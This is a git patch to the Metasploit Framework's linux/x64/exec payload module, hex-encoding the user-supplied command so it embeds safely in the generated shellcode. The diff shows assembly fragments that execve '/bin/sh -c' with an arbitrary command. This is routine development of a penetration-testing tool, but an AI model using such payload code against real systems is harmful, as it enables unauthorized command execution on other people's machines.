From 9019e4c837005d62da75014e9f42a51d754f4664 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Tue, 5 May 2026 13:16:30 -0400
Subject: [PATCH] Escape the command in linux/x64/exec

---
 modules/payloads/singles/linux/x64/exec.rb | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/modules/payloads/singles/linux/x64/exec.rb b/modules/payloads/singles/linux/x64/exec.rb
index cbc68a9765..cb1498d184 100644
--- a/modules/payloads/singles/linux/x64/exec.rb
+++ b/modules/payloads/singles/linux/x64/exec.rb
@@ -39,6 +39,7 @@ module MetasploitModule
 
   def generate(_opts = {})
     cmd = datastore['CMD'] || ''
+    cmd = cmd.bytes.map { |byte| "0x%02x" % byte }.join(', ')
     nullfreeversion = datastore['NullFreeVersion']
 
     if cmd.empty?
@@ -144,7 +145,7 @@ module MetasploitModule
             syscall                 ; execve("//bin/sh", ["//bin/sh", "-c", "*CMD*"], NULL)
           tocall:
             call afterjmp
-            db "#{cmd}"             ; arbitrary command
+            db #{cmd}               ; arbitrary command
         EOS
       else
         # 37 bytes without cmd (not null-free)
@@ -163,7 +164,7 @@ module MetasploitModule
 
             push rdx                ; NULL
             call continue
-            db "#{cmd}", 0x00       ; arbitrary command
+            db #{cmd}, 0x00         ; arbitrary command
           continue:
             push rsi                ; "-c"
             push rdi                ; "/bin/sh"